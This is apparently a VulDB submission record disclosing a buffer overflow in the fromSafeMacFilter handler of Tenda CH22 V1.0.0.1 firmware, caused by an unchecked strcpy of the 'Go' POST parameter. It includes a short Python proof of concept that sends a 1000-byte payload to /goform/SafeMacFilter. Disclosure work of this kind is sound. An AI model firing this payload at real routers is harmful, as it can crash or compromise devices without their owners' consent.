| Title | Tenda CH22 V1.0.0.1 Buffer Overflow |
|---|
| Description | ## Vulnerability details
The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `fromSafeMacFilter` function. The `v1` variable receives the `Go` parameter from a POST request and is later passed to the `strcpy` function. However, since the user can control the input of `Go` , the statement `strcpy(s, v1);` can cause a buffer overflow.
## PoC
import requests
ip = "192.168.1.1"
url = f'http://{ip}/goform/SafeMacFilter'
payload = b'a' * 1000
data = {
'Go': payload,
'menufacturer': 'tenda'
}
requests.post(url, data=data) |
|---|
| Source | ⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-fromSafeMacFilter-383df0aa1185808a937ccc9caf9e9afe |
|---|
| User | ysnysn0121 (UID 86198) |
|---|
| Submission | 06/18/2026 14:24 (2 months ago) |
|---|
| Moderation | 08/05/2026 23:34 (2 months later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 329904 [Tenda CH22 1.0.0.1 /goform/SafeMacFilter fromSafeMacFilter page buffer overflow] |
|---|
| Points | 0 |
|---|